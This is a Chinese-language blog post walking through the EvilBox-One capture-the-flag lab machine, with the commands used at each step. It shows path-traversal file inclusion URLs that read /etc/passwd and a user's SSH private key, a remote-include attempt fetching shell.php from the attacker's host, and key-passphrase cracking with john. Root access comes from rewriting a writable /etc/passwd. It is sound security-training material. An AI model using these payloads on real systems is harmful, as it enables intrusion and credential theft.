<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha256-xejo6yLi6vGtAjcMIsY8BHdKsLg7QynVlFMzdQgUuy8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"topdayplus.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.12.3","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="EvilBox---One打靶记录">
<meta property="og:type" content="article">
<meta property="og:title" content="EvilBox_One">
<meta property="og:url" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/index.html">
<meta property="og:site_name" content="Topday&#39;s Blog">
<meta property="og:description" content="EvilBox---One打靶记录">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/01.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/02.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/03.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/04.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/05.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/06.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/07.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/08.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/09.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/10.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/11.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/12.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/13.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/14.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/15.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/16.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/17.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/18.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/19.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/20.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/21.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/22.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/23.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/24.png">
<meta property="article:published_time" content="2022-11-23T15:17:24.000Z">
<meta property="article:modified_time" content="2022-12-01T13:19:48.269Z">
<meta property="article:author" content="Topday">
<meta property="article:tag" content="打靶">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://topdayplus.github.io/2022/11/23/EvilBox-One/01.png">


<link rel="canonical" href="http://topdayplus.github.io/2022/11/23/EvilBox-One/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://topdayplus.github.io/2022/11/23/EvilBox-One/","path":"2022/11/23/EvilBox-One/","title":"EvilBox_One"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>EvilBox_One | Topday's Blog</title>
  






  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Topday's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Topday"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Topday</p>
  <div class="site-description" itemprop="description">For me, it has not yet been realized what the rest of one’s life, is my greatest encouragement.</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/topdayplus" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;topdayplus" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://topdayplus.github.io/2022/11/23/EvilBox-One/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Topday">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Topday's Blog">
      <meta itemprop="description" content="For me, it has not yet been realized what the rest of one’s life, is my greatest encouragement.">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="EvilBox_One | Topday's Blog">
      <meta itemprop="description" content="EvilBox---One打靶记录">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          EvilBox_One
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
  
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-11-23 23:17:24" itemprop="dateCreated datePublished" datetime="2022-11-23T23:17:24+08:00">2022-11-23</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2022-12-01 21:19:48" itemprop="dateModified" datetime="2022-12-01T21:19:48+08:00">2022-12-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%BA%A2%E9%98%9F/" itemprop="url" rel="index"><span itemprop="name">红队</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>3.1k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>3 分钟</span>
    </span>
</div>

            <div class="post-description">EvilBox---One打靶记录</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p><strong>0x01 主机发现</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo arp-scan -l</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/01.png" class title="This is an example image">



<p><strong>0x02 端口扫描</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -p- 10.0.2.9</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/02.png" class title="This is an example image">



<p><strong>0x03 服务发现</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -p22,80 -A 10.0.2.9</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/03.png" class title="This is an example image">



<p><strong>0x04 多重路径爆破</strong></p>
<p>看到只开放了 22 端口和 80 端口，初步尝试 <strong>SSH 爆破无果</strong>，访问页面试试</p>
<img src="/2022/11/23/EvilBox-One/04.png" class title="This is an example image">



<p>只有一个 Apache 初始页面，对于这样的页面思路就是<strong>路径爆破</strong>了。先试着访问默认的 robots.txt 是否存在。</p>
<img src="/2022/11/23/EvilBox-One/05.png" class title="This is an example image">



<p>接着使用 gobuster 进行路径爆破（其他工具皆可，此工具为 GO 语言编写，速度较快）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -u http://10.0.2.9 -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,hyml,jsp</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/06.png" class title="This is an example image">



<p>只发现了一个二级目录 &#x2F;secret，此<strong>页面访问为空</strong>，<strong>右键查看源代码也为空</strong>，那对二级目录继续尝试爆破</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -u http://10.0.2.9/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,hyml,jsp</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/07.png" class title="This is an example image">



<p><strong>0x05 文件参数爆破&amp;文件包含漏洞</strong></p>
<p>发现 &#x2F;secret 目录下存在一个 evil.php 文件，这里<strong>访问页面还是为空，右键查看源代码也为空</strong>。那就继续尝试对此php的<strong>执行参数进行爆破</strong>（这个可能比较少见，但试试）。先新建参数值字典：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vi val.txt #将(1 2 3 a b c &#x27; &quot; ( &lt; , ; ? / %)作为字典值，换行写入</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAN -w val.txt:VAL -u http://10.0.2.9/secret/evil.php?PARAN=VAL -fs 0</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/08.png" class title="This is an example image">



<p>第一次尝试没爆破出结果，那尝试参数包含文件，即<strong>尝试包含服务器本地存在的文件</strong>，即 index.html</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.0.2.9/secret/evil.php?FUZZ=../index.html -fs 0</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/09.png" class title="This is an example image">



<p>可以看到存在 command 参数，疑似存在包含漏洞，访问以下链接效果相同，说明确实存在文件包含漏洞</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.2.9/secret/evil.php?command=../index.html </span><br><span class="line">http://10.0.2.9</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/10.png" class title="This is an example image">



<p>那尝试远程文件包含，即在本机新建 shell.php，让目标在远程加载</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.2.9/secret/evil.php?command=http://10.0.2.4/shell.php</span><br></pre></td></tr></table></figure>



<p>无果，推测此文件包含漏洞属于本地文件包含，并不能远程包含文件。</p>
<p>那现在的思路是使用 php 语言支持的封装器，就是各种请求协议，比如 data、php、file、zip等。先用 php 协议尝试读取当前漏洞文件源码，此处需把源码转换成 Base64 读取，不然 php 源码会直接被解析</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.2.9/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/11.png" class title="This is an example image">



<p>解码获得 evil.php 源码，确实存在文件包含漏洞</p>
<img src="/2022/11/23/EvilBox-One/12.png" class title="This is an example image">



<p>这里想着能否用 php 协议写入文件，尝试访问，直接404，应该是没有写入权限。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.2.9/secret/evil.php?command=php://filter/write=convert.base64-decode/resource=test.php&amp;txt=MTIz</span><br></pre></td></tr></table></figure>



<p><strong>0x05 本地文件读取&amp;SSH密钥破解</strong></p>
<p>继续尝试，想起这个文件包含漏洞是针对本地的，那么可以用于文件读取，尝试读取 <strong>&#x2F;etc&#x2F;passwd</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.2.9/secret/evil.php?command=../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/13.png" class title="This is an example image">



<p>成功读取并看到有一个非系统账户 mowree 有 bash 权限。想起目标开放了 SSH 登录服务，并且支持密钥登录。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh mowree@10.0.2.9 -v  # -v 参数打印登录详细信息</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/14.png" class title="This is an example image">



<p>补充一下：密钥登录是，客户生成 SSH 公私钥，把公钥放在服务器上，私钥放在本机，两者用于登录验证，但默认配置，公私钥是在服务器上的。</p>
<p>那现在的思路就变为，是否能够利用文件包含漏洞，读取公钥、私钥信息，用于直接登录。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.2.9/secret/evil.php?command=../../../../home/mowree/.ssh/id_rsa#私钥，本地用于登录认证</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/15.png" class title="This is an example image">



<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.2.9/secret/evil.php?command=../../../../home/mowree/.ssh/authorized_keys#公钥，放在服务器上</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/16.png" class title="This is an example image">



<p>把私钥复制到本地，新建 id_rsa 文件，赋予600权限，太大太小都不行，尝试登录：</p>
<img src="/2022/11/23/EvilBox-One/17.png" class title="This is an example image">



<p>好吧~，人家对私钥进行了加密，还需要另外的密码才能使用这个！</p>
<p>但这里确实是个突破点，就只能继续尝试爆破了</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">复制本机破解字典</span></span><br><span class="line">cp /usr/share/wordlists/rockyou.txt.gz .</span><br><span class="line">gunzip rockyou.txt.gz</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">转换密钥格式，便于工具破解</span></span><br><span class="line">/usr/share/john/ssh2john.py /home/kali/Desktop/tool/id_rsa &gt; /home/kali/Desktop/tool/hash </span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">破解私钥加密密码</span></span><br><span class="line">john hash --worlist=rockyou.txt</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/18.png" class title="This is an example image">



<p>成功登录~</p>
<img src="/2022/11/23/EvilBox-One/19.png" class title="This is an example image">



<p><strong>0x06 提权到 root</strong></p>
<p>常见提权手段来一波</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo -l # 无 sudo 权限配置不当</span><br><span class="line">uname -a # 无可利用内核提权漏洞</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/20.png" class title="This is an example image">



<p>那就找找有没有 suid 或 sgid 配置不当的文件，发现只有默认的系统文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm /4000 2&gt;/dev/null #搜索权限配置不当，屏蔽错误信息 suid-4000 sgid-2000</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/21.png" class title="This is an example image">



<p>那就再找找有没有配置不当的可读写文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -writable 2&gt;/dev/null | grep -v proc | grep -v sys | grep -v tmp #过滤部分文件前缀</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/22.png" class title="This is an example image">



<p>可看到当前用户对 &#x2F;etc&#x2F;passwd 居然有读写权限。&#x2F;etc&#x2F;passwd文件只存在账号列表及对应的权限，对应的密码文件存储在 &#x2F;etc&#x2F;shadow 文件，只有 root 能读写。但如果能直接修改 &#x2F;etc&#x2F;passwd文件，就可以直接覆盖 root 密码</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl passwd -1 #生成加密密码</span><br></pre></td></tr></table></figure>

<img src="/2022/11/23/EvilBox-One/23.png" class title="This is an example image">



<p>成功登录</p>
<img src="/2022/11/23/EvilBox-One/24.png" class title="This is an example image">
    </div>

    
    
    
	

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Topday
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://topdayplus.github.io/2022/11/23/EvilBox-One/" title="EvilBox_One">http://topdayplus.github.io/2022/11/23/EvilBox-One/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/%E6%89%93%E9%9D%B6/" rel="tag"># 打靶</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/11/12/hard-socnet2/" rel="prev" title="Hard_socnet2">
                  <i class="fa fa-chevron-left"></i> Hard_socnet2
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/12/01/Hacker-Kid/" rel="next" title="Hacker_Kid">
                  Hacker_Kid <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Topday</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">266k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">4:02</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div><script color="0,0,255" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>


    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
